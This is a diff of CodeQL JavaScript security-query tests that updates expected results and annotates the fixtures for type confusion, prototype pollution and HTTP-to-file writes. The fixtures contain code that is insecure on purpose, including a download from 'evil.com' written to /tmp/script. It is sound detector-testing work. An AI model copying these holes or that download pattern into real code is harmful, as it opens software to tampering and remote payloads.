tst.js:30:5:30:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | +| tst.js:48:5:48:7 | foo | tst.js:47:15:47:35 | ctx.req ... ery.foo | tst.js:48:5:48:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:47:15:47:35 | ctx.req ... ery.foo | this HTTP request parameter | +| tst.js:83:9:83:9 | p | tst.js:79:25:79:38 | req.query.path | tst.js:83:9:83:9 | p | Potential type confusion as $@ may be either an array or a string. 
| tst.js:79:25:79:38 | req.query.path | this HTTP request parameter | +| tst.js:84:9:84:9 | p | tst.js:79:25:79:38 | req.query.path | tst.js:84:9:84:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:79:25:79:38 | req.query.path | this HTTP request parameter | +| tst.js:92:5:92:12 | data.foo | tst.js:92:5:92:12 | data.foo | tst.js:92:5:92:12 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:92:5:92:12 | data.foo | this HTTP request parameter | +| tst.js:94:9:94:16 | data.foo | tst.js:94:9:94:16 | data.foo | tst.js:94:9:94:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:94:9:94:16 | data.foo | this HTTP request parameter | +| tst.js:100:9:100:16 | data.foo | tst.js:100:9:100:16 | data.foo | tst.js:100:9:100:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:100:9:100:16 | data.foo | this HTTP request parameter | +| tst.js:106:5:106:8 | data | tst.js:105:16:105:29 | req.query.data | tst.js:106:5:106:8 | data | Potential type confusion as $@ may be either an array or a string. | tst.js:105:16:105:29 | req.query.data | this HTTP request parameter | edges | tst.js:5:9:5:27 | foo | tst.js:6:5:6:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:6:5:6:7 | foo | provenance | | 
@@ -11,14 +26,16 @@ edges | tst.js:5:9:5:27 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:5:9:5:27 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:5:9:5:27 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:5:9:5:27 | foo | tst.js:30:5:30:7 | foo | provenance | | | tst.js:5:15:5:27 | req.query.foo | tst.js:5:9:5:27 | foo | provenance | | | tst.js:6:5:6:7 | foo | tst.js:8:5:8:7 | foo | provenance | | | tst.js:6:5:6:7 | foo | tst.js:8:5:8:7 | foo | provenance | | -| tst.js:8:5:8:7 | foo | tst.js:10:5:12:5 | functio ... K\\n } [foo] | provenance | | +| tst.js:8:5:8:7 | foo | tst.js:10:5:12:5 | functio ... t\\n } [foo] | provenance | | | tst.js:8:5:8:7 | foo | tst.js:17:7:17:9 | foo | provenance | | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | tst.js:10:14:10:14 | f [foo] | provenance | | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | tst.js:11:9:11:11 | foo | provenance | | -| tst.js:10:14:10:14 | f [foo] | tst.js:39:12:39:12 | f [foo] | provenance | | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | tst.js:10:14:10:14 | f [foo] | provenance | | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | tst.js:11:9:11:11 | foo | provenance | | +| tst.js:10:14:10:14 | f [foo] | tst.js:41:12:41:12 | f [foo] | provenance | | | tst.js:14:16:14:18 | bar | tst.js:15:9:15:11 | bar | provenance | | | tst.js:17:7:17:9 | foo | tst.js:14:16:14:18 | bar | provenance | | | tst.js:17:7:17:9 | foo | tst.js:21:5:21:7 | foo | provenance | | 
@@ -28,14 +45,16 @@ edges | tst.js:25:5:25:7 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:25:5:25:7 | foo | tst.js:27:5:27:7 | foo | provenance | | | tst.js:27:5:27:7 | foo | tst.js:28:5:28:7 | foo | provenance | | -| tst.js:39:12:39:12 | f [foo] | tst.js:11:9:11:11 | foo | provenance | | -| tst.js:45:9:45:35 | foo | tst.js:46:5:46:7 | foo | provenance | | -| tst.js:45:15:45:35 | ctx.req ... ery.foo | tst.js:45:9:45:35 | foo | provenance | | -| tst.js:77:25:77:38 | req.query.path | tst.js:80:23:80:23 | p | provenance | | -| tst.js:80:23:80:23 | p | tst.js:81:9:81:9 | p | provenance | | -| tst.js:80:23:80:23 | p | tst.js:82:9:82:9 | p | provenance | | -| tst.js:103:9:103:29 | data | tst.js:104:5:104:8 | data | provenance | | -| tst.js:103:16:103:29 | req.query.data | tst.js:103:9:103:29 | data | provenance | | +| tst.js:27:5:27:7 | foo | tst.js:28:5:28:7 | foo | provenance | | +| tst.js:28:5:28:7 | foo | tst.js:30:5:30:7 | foo | provenance | | +| tst.js:41:12:41:12 | f [foo] | tst.js:11:9:11:11 | foo | provenance | | +| tst.js:47:9:47:35 | foo | tst.js:48:5:48:7 | foo | provenance | | +| tst.js:47:15:47:35 | ctx.req ... ery.foo | tst.js:47:9:47:35 | foo | provenance | | +| tst.js:79:25:79:38 | req.query.path | tst.js:82:23:82:23 | p | provenance | | +| tst.js:82:23:82:23 | p | tst.js:83:9:83:9 | p | provenance | | +| tst.js:82:23:82:23 | p | tst.js:84:9:84:9 | p | provenance | | +| tst.js:105:9:105:29 | data | tst.js:106:5:106:8 | data | provenance | | +| tst.js:105:16:105:29 | req.query.data | tst.js:105:9:105:29 | data | provenance | | nodes | tst.js:5:9:5:27 | foo | semmle.label | foo | | tst.js:5:15:5:27 | req.query.foo | semmle.label | req.query.foo | 
@@ -43,7 +62,7 @@ nodes | tst.js:6:5:6:7 | foo | semmle.label | foo | | tst.js:8:5:8:7 | foo | semmle.label | foo | | tst.js:8:5:8:7 | foo | semmle.label | foo | -| tst.js:10:5:12:5 | functio ... K\\n } [foo] | semmle.label | functio ... K\\n } [foo] | +| tst.js:10:5:12:5 | functio ... t\\n } [foo] | semmle.label | functio ... t\\n } [foo] | | tst.js:10:14:10:14 | f [foo] | semmle.label | f [foo] | | tst.js:11:9:11:11 | foo | semmle.label | foo | | tst.js:14:16:14:18 | bar | semmle.label | bar | 
@@ -56,32 +75,20 @@ nodes | tst.js:27:5:27:7 | foo | semmle.label | foo | | tst.js:27:5:27:7 | foo | semmle.label | foo | | tst.js:28:5:28:7 | foo | semmle.label | foo | -| tst.js:39:12:39:12 | f [foo] | semmle.label | f [foo] | -| tst.js:45:9:45:35 | foo | semmle.label | foo | -| tst.js:45:15:45:35 | ctx.req ... ery.foo | semmle.label | ctx.req ... ery.foo | -| tst.js:46:5:46:7 | foo | semmle.label | foo | -| tst.js:77:25:77:38 | req.query.path | semmle.label | req.query.path | -| tst.js:80:23:80:23 | p | semmle.label | p | -| tst.js:81:9:81:9 | p | semmle.label | p | -| tst.js:82:9:82:9 | p | semmle.label | p | -| tst.js:90:5:90:12 | data.foo | semmle.label | data.foo | -| tst.js:92:9:92:16 | data.foo | semmle.label | data.foo | -| tst.js:98:9:98:16 | data.foo | semmle.label | data.foo | -| tst.js:103:9:103:29 | data | semmle.label | data | -| tst.js:103:16:103:29 | req.query.data | semmle.label | req.query.data | -| tst.js:104:5:104:8 | data | semmle.label | data | +| tst.js:28:5:28:7 | foo | semmle.label | foo | +| tst.js:30:5:30:7 | foo | semmle.label | foo | +| tst.js:41:12:41:12 | f [foo] | semmle.label | f [foo] | +| tst.js:47:9:47:35 | foo | semmle.label | foo | +| tst.js:47:15:47:35 | ctx.req ... ery.foo | semmle.label | ctx.req ... 
ery.foo | +| tst.js:48:5:48:7 | foo | semmle.label | foo | +| tst.js:79:25:79:38 | req.query.path | semmle.label | req.query.path | +| tst.js:82:23:82:23 | p | semmle.label | p | +| tst.js:83:9:83:9 | p | semmle.label | p | +| tst.js:84:9:84:9 | p | semmle.label | p | +| tst.js:92:5:92:12 | data.foo | semmle.label | data.foo | +| tst.js:94:9:94:16 | data.foo | semmle.label | data.foo | +| tst.js:100:9:100:16 | data.foo | semmle.label | data.foo | +| tst.js:105:9:105:29 | data | semmle.label | data | +| tst.js:105:16:105:29 | req.query.data | semmle.label | req.query.data | +| tst.js:106:5:106:8 | data | semmle.label | data | subpaths -#select -| tst.js:6:5:6:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:6:5:6:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:8:5:8:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:8:5:8:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:11:9:11:11 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:11:9:11:11 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:15:9:15:11 | bar | tst.js:5:15:5:27 | req.query.foo | tst.js:15:9:15:11 | bar | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:27:5:27:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:27:5:27:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:28:5:28:7 | foo | tst.js:5:15:5:27 | req.query.foo | tst.js:28:5:28:7 | foo | Potential type confusion as $@ may be either an array or a string. 
| tst.js:5:15:5:27 | req.query.foo | this HTTP request parameter | -| tst.js:46:5:46:7 | foo | tst.js:45:15:45:35 | ctx.req ... ery.foo | tst.js:46:5:46:7 | foo | Potential type confusion as $@ may be either an array or a string. | tst.js:45:15:45:35 | ctx.req ... ery.foo | this HTTP request parameter | -| tst.js:81:9:81:9 | p | tst.js:77:25:77:38 | req.query.path | tst.js:81:9:81:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:77:25:77:38 | req.query.path | this HTTP request parameter | -| tst.js:82:9:82:9 | p | tst.js:77:25:77:38 | req.query.path | tst.js:82:9:82:9 | p | Potential type confusion as $@ may be either an array or a string. | tst.js:77:25:77:38 | req.query.path | this HTTP request parameter | -| tst.js:90:5:90:12 | data.foo | tst.js:90:5:90:12 | data.foo | tst.js:90:5:90:12 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:90:5:90:12 | data.foo | this HTTP request parameter | -| tst.js:92:9:92:16 | data.foo | tst.js:92:9:92:16 | data.foo | tst.js:92:9:92:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:92:9:92:16 | data.foo | this HTTP request parameter | -| tst.js:98:9:98:16 | data.foo | tst.js:98:9:98:16 | data.foo | tst.js:98:9:98:16 | data.foo | Potential type confusion as $@ may be either an array or a string. | tst.js:98:9:98:16 | data.foo | this HTTP request parameter | -| tst.js:104:5:104:8 | data | tst.js:103:16:103:29 | req.query.data | tst.js:104:5:104:8 | data | Potential type confusion as $@ may be either an array or a string. | tst.js:103:16:103:29 | req.query.data | this HTTP request parameter | diff --git a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref index a7fa58d3b2bc..ede9b8f867cb 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-843/TypeConfusionThroughParameterTampering.qlref
@@ -1 +1,2 @@
-Security/CWE-843/TypeConfusionThroughParameterTampering.ql
+query: Security/CWE-843/TypeConfusionThroughParameterTampering.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js
index 3f5840b9f080..40e18cf22e9f 100644
--- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js
+++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js
@@ -2,60 +2,62 @@ var express = require('express'); var Koa = require('koa'); express().get('/some/path', function (req, res) { - var foo = req.query.foo; - foo.indexOf(); // NOT OK + var foo = req.query.foo; // $ Source + foo.indexOf(); // $ Alert - foo.concat(); // NOT OK + foo.concat(); // $ Alert function f() { - foo.concat(); // NOT OK + foo.concat(); // $ Alert } function g(bar) { - bar.concat(); // NOT OK + bar.concat(); // $ Alert } g(foo); - req.url.indexOf(); // OK + req.url.indexOf(); - foo.indexOf(prefix) === 0; // OK - foo.indexOf(prefix) == 0; // OK - foo.indexOf(prefix) !== 0; // OK + foo.indexOf(prefix) === 0; + foo.indexOf(prefix) == 0; + foo.indexOf(prefix) !== 0; - foo.slice(-1) === 'x'; // OK + foo.slice(-1) === 'x'; - foo.indexOf(prefix) == 1; // NOT OK - foo.slice(1) === 'x'; // NOT OK + foo.indexOf(prefix) == 1; // $ Alert + foo.slice(1) === 'x'; // $ Alert + + foo.length; // $ Alert if (typeof foo === "string") { - foo.indexOf(); // OK + foo.indexOf(); } else { - foo.indexOf(); // OK + foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // OK, but still flagged [INCONSISTENCY] + foo.indexOf(); } - (foo + f()).indexOf(); // OK + (foo + f()).indexOf(); - foo.length; // NOT OK + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { - var foo = ctx.request.query.foo; - foo.indexOf(); // NOT OK + var foo = ctx.request.query.foo; // $ Source + foo.indexOf(); // $ Alert }); express().get('/some/path/:foo', function (req, res) { var foo = req.params.foo; - foo.indexOf(); // OK + foo.indexOf(); }); express().get('/some/path/:foo', function (req, res) { - if (req.query.path.length) { } // OK - req.query.path.length == 0; // OK - !req.query.path.length; // OK - req.query.path.length > 0; // OK + if (req.query.path.length) { } + req.query.path.length == 0; + !req.query.path.length; + req.query.path.length > 0; }); express().get('/some/path/:foo', function (req, res) { 
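Review bot: The `$ MISSING: Alert` comment on the last `foo.length` in the first handler records a false negative without naming the guard that causes it; judging by the hunk it is the `if (typeof foo === "string") { … } else { … }` block, after which `foo` can again be either a string or an array. I would spell that out, e.g. `foo.length; // $ MISSING: Alert - the typeof-guarded if/else above is treated as sanitising both branches, so flow stops there`, so the gap in the type-confusion query stays traceable if the guard handling changes. The `foo instanceof Array` branch also loses its `[INCONSISTENCY]` note with no replacement annotation; if that line is now intentionally unflagged, a short comment such as `// array branch: no alert expected` would keep the intent visible.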
@@ -65,21 +67,21 @@ express().get('/some/path/:foo', function (req, res) { return; } - while (p.length) { // OK + while (p.length) { p = p.substr(1); } - p.length < 1; // OK + p.length < 1; }); express().get('/some/path/:foo', function (req, res) { let someObject = {}; - safeGet(someObject, req.query.path).bar = 'baz'; // prototype pollution here - but flagged in `safeGet` + safeGet(someObject, req.query.path).bar = 'baz'; // $ Source - prototype pollution here - but flagged in `safeGet` }); function safeGet(obj, p) { - if (p === '__proto__' || // NOT OK - could be singleton array - p === 'constructor') { // NOT OK - could be singleton array + if (p === '__proto__' || // $ Alert - could be singleton array + p === 'constructor') { // $ Alert - could be singleton array return null; } return obj[p]; @@ -87,24 +89,24 @@ function safeGet(obj, p) { express().get('/foo', function (req, res) { let data = req.query; - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } if (typeof data.foo !== 'string') { - data.foo.indexOf(); // OK + data.foo.indexOf(); } if (typeof data.foo !== 'undefined') { - data.foo.indexOf(); // NOT OK + data.foo.indexOf(); // $ Alert } }); express().get('/foo', function (req, res) { - let data = req.query.data; - data.indexOf(); // NOT OK + let data = req.query.data; // $ Source + data.indexOf(); // $ Alert if (Array.isArray(data)) { - data.indexOf(); // OK + data.indexOf(); } else { - data.indexOf(); // OK + data.indexOf(); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref b/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref index 894dcbc7cbb2..3350d038cd52 100644 --- a/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-862/EmptyPasswordInConfigurationFile.qlref @@ -1 +1 @@ -Security/CWE-862/EmptyPasswordInConfigurationFile.ql +query: Security/CWE-862/EmptyPasswordInConfigurationFile.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected index 0928df48ef9a..1fc29a85b645 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.expected @@ -1,3 +1,8 @@ +#select +| HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | Write to file system depends on $@. | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data | +| tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | +| tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | +| tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | edges | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | provenance | | | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | provenance | | 
@@ -17,8 +22,3 @@ nodes | tst.js:19:25:19:25 | c | semmle.label | c | | tst.js:24:22:24:22 | c | semmle.label | c | subpaths -#select -| HttpToFileAccess.js:6:37:6:37 | d | HttpToFileAccess.js:5:18:5:18 | d | HttpToFileAccess.js:6:37:6:37 | d | Write to file system depends on $@. | HttpToFileAccess.js:5:18:5:18 | d | Untrusted data | -| tst.js:16:33:16:33 | c | tst.js:15:26:15:26 | c | tst.js:16:33:16:33 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | -| tst.js:19:25:19:25 | c | tst.js:15:26:15:26 | c | tst.js:19:25:19:25 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | -| tst.js:24:22:24:22 | c | tst.js:15:26:15:26 | c | tst.js:24:22:24:22 | c | Write to file system depends on $@. | tst.js:15:26:15:26 | c | Untrusted data | diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..3c56f9bdf2f0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -2,7 +2,7 @@ var https = require("https"); var fs = require("fs"); https.get('https://evil.com/script', res => { - res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + res.on("data", d => { // $ Source + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref index 674372632908..d40718a26d8e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.qlref @@ -1 +1,2 @@ -Security/CWE-912/HttpToFileAccess.ql +query: Security/CWE-912/HttpToFileAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Security/CWE-912/tst.js b/javascript/ql/test/query-tests/Security/CWE-912/tst.js index 78acef7d3aad..00e89fd11e6f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/tst.js @@ -12,28 +12,28 @@ try { }, (response) => { response.setEncoding('utf8'); - response.on('data', (c) => { - fs.writeFile("/tmp/test", c, (err) => {}); // BAD: data from response 'on' event flows to file + response.on('data', (c) => { // $ Source + fs.writeFile("/tmp/test", c, (err) => {}); // $ Alert - data from response 'on' event flows to file let writeStream = fs.createWriteStream('/usr/evil/evil.cmd'); - writeStream.write(c); // BAD: data from response 'on' event flows to filestream write + writeStream.write(c); // $ Alert - data from response 'on' event flows to filestream write writeStream.end(); var stream = fs.createWriteStream("my_file.txt"); stream.once('open', function (fd) { - stream.write(c); // BAD: data from response 'on' event flows to filestream write + stream.write(c); // $ Alert - data from response 'on' event flows to filestream write stream.end(); }); }); response.on('error', () => { - fs.writeFile("/tmp/test", "error occured"); // GOOD: static data written to file + fs.writeFile("/tmp/test", "error occured"); // OK - static data written to file }); }).on('error', () => { let error = "error occured"; let writeStream = fs.createWriteStream('/usr/good/errorlog.txt'); - writeStream.write(error); // GOOD: static data written to file stream + writeStream.write(error); // OK - static data written to file stream writeStream.end(); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644 index 8efa3a055b19..000000000000 
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected
+++ /dev/null
@@ -1 +0,0 @@
-| lib.js:70 | expected an alert, but found none | NOT OK | Config |
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql
deleted file mode 100644
index d80f9d23ff52..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql
+++ /dev/null
@@ -1,16 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery
-
-deprecated class Config extends ConsistencyConfiguration {
- Config() { this = "Config" }
-
- override File getAFile() { any() }
-
- override DataFlow::Node getAnAlert() {
- exists(DataFlow::Node source |
- PrototypePollutingAssignmentFlow::flow(source, result) and
- not isIgnoredLibraryFlow(source, result)
- )
- }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected
index 34df462cf0ae..67aadb32c311 100644
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected
@@ -1,3 +1,31 @@ +#select +| lib.js:6:7:6:9 | obj | lib.js:1:43:1:46 | path | lib.js:6:7:6:9 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:1:43:1:46 | path | library input | +| lib.js:15:3:15:14 | obj[path[0]] | lib.js:14:38:14:41 | path | lib.js:15:3:15:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:14:38:14:41 | path | library input | +| lib.js:22:3:22:14 | obj[path[0]] | lib.js:20:14:20:22 | arguments | lib.js:22:3:22:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:20:14:20:22 | arguments | library input | +| lib.js:26:10:26:21 | obj[path[0]] | lib.js:25:44:25:47 | path | lib.js:26:10:26:21 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:25:44:25:47 | path | library input | +| lib.js:34:3:34:14 | obj[path[0]] | lib.js:30:43:30:51 | arguments | lib.js:34:3:34:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:30:43:30:51 | arguments | library input | +| lib.js:42:3:42:14 | obj[path[0]] | lib.js:38:27:38:35 | arguments | lib.js:42:3:42:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:38:27:38:35 | arguments | library input | +| lib.js:87:10:87:14 | proto | lib.js:83:14:83:22 | arguments | lib.js:87:10:87:14 | proto | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:83:14:83:22 | arguments | library input | +| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. 
| lib.js:104:13:104:21 | arguments | library input | +| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input | +| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input | +| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input | +| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input | +| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input | +| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:9:5:9:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:9:5:9:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:14:5:14:32 | unsafeG ... 
taint) | tst.js:5:24:5:37 | req.query.data | tst.js:14:5:14:32 | unsafeG ... taint) | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:34:5:34:7 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:34:5:34:7 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:39:9:39:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:39:9:39:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:45:9:45:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:45:9:45:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:48:9:48:11 | obj | tst.js:5:24:5:37 | req.query.data | tst.js:48:9:48:11 | obj | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input | +| tst.js:80:5:80:17 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:80:5:80:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:82:5:82:22 | object["" + taint] | tst.js:77:24:77:37 | req.query.data | tst.js:82:5:82:22 | object["" + taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. 
| tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:87:9:87:21 | object[taint] | tst.js:77:24:77:37 | req.query.data | tst.js:87:9:87:21 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:77:24:77:37 | req.query.data | user controlled input | +| tst.js:94:5:94:37 | obj[req ... ', '')] | tst.js:94:9:94:19 | req.query.x | tst.js:94:5:94:37 | obj[req ... ', '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:94:9:94:19 | req.query.x | user controlled input | +| tst.js:97:5:97:46 | obj[req ... g, '')] | tst.js:97:9:97:19 | req.query.x | tst.js:97:5:97:46 | obj[req ... g, '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:97:9:97:19 | req.query.x | user controlled input | +| tst.js:105:5:105:17 | object[taint] | tst.js:102:24:102:37 | req.query.data | tst.js:105:5:105:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:102:24:102:37 | req.query.data | user controlled input | +| tst.js:130:5:130:53 | obj[req ... ), '')] | tst.js:130:9:130:19 | req.query.x | tst.js:130:5:130:53 | obj[req ... ), '')] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:130:9:130:19 | req.query.x | user controlled input | edges | lib.js:1:38:1:40 | obj | lib.js:6:7:6:9 | obj | provenance | | | lib.js:1:43:1:46 | path | lib.js:2:21:2:24 | path | provenance | | 
